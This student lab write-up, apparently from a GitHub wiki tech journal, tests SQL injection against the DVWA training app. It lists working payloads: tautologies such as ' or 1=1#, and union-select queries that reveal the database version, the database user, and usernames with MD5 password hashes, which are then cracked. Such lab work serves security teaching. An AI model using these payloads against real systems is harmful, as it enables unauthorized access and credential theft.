Web Security Lab Part 3: SQL Injection - Hsanokklis/2022-2023-Tech-journal GitHub Wiki

Summary: Demonstrate how to test for SQL injection vulnerabilities

  1. Go to SQL Injection

image

Basic Injection

In order to exploit SQL injection vulnerabilities, we need to figure out how the query is built in order to inject our parameter in a situation that the query will remain true.

  • Input a 1 into the User ID box

image

_ This means that this command is being executed in the database SELECT First_Name,Surname FROM table WHERE_

Testing for SQL Injection Vulnerabilities

  1. Test code '=> and 1=1#

image

  • code '=> gives me a fatal error

image

  1. Test code ' or 1=1# (when I did the code ' or 1=1# => it returned the same thing)

image

  1. Test code ' or 0=0 union select null, version() #

image

_ at the the end you can see the database version running the DVWA_

  1. Test code ** ' or 0=0 union select null, user() #**

image

shows the account that the DVWA database is run on

  1. Test code ** ' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #**

image

shows usernames and password hashes in the database

  1. Open Password Cracker and decrypt the hashed passwords in the database

User: Admin

image

User: Gordan Brown

image

User: Hack Me

image

User: Pablo Picasso

image

User: Bob Smith

image

Hashes are all md5